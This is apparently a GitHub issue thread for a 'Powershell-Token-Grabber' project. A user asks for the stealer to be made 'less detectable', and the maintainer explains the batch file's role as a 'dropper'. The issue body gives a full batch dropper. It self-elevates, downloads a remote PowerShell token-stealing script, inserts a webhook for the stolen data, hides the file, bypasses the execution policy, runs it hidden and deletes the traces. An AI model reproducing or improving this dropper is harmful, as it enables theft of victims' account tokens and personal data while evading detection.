### ISSUE TITLE
Better BATCH IDEA

### ISSUE THREAD

**Issue by ExecutivePrograms** [ChildrenOfYahweh/Powershell-Token-Grabber#124]
hi daddy i think you shall code the batch file to send the user info instead of it using the python file to send the info.

Instead of:
**@echo off

net session >nul 2>&1
if not %errorlevel% == 0 ( powershell.exe -ExecutionPolicy Bypass -NoProfile -Command "Start-Process -Verb RunAs -FilePath '%~f0'" & exit /b 0)
cd /d %~dp0

powershell -c "$t = Iwr -Uri 'https://raw.githubusercontent.com/KDot227/Powershell-Token-Grabber/main/main.ps1' -UseBasicParsing; $t -replace 'YOUR_WEBHOOK_HERE', 'YOUR_WEBHOOK_HERE2' | Out-File -FilePath 'powershell123.ps1' -Encoding ASCII"
attrib +h +s powershell123.ps1
powershell Set-ExecutionPolicy -Scope CurrentUser -ExecutionPolicy Unrestricted -Force
powershell -noprofile -executionpolicy bypass -WindowStyle hidden -file powershell123.ps1
attrib -h -s powershell123.ps1
del powershell123.ps1 /f /q
timeout 3 > nul
exit**

Make the batch file to steal the info without needing the python. It will be less detectable

**Comment by KDot227** [comment]
> @KDot227 whats the purpose of executing the script in this manner rather than iwr | iex

Batch = dropper

I could have it do that but batch only allows around 8k letters per command.

**Comment by KDot227** [comment]
> perhaps make the script take command line parameters and execute it using a web request so no additional files are dropped

then the original powershell only file wouldn't work

**Comment by KDot227** [comment]
unless I made it specifically take commandline input and had a check for it but this is basically a dead project I would rather completely remake
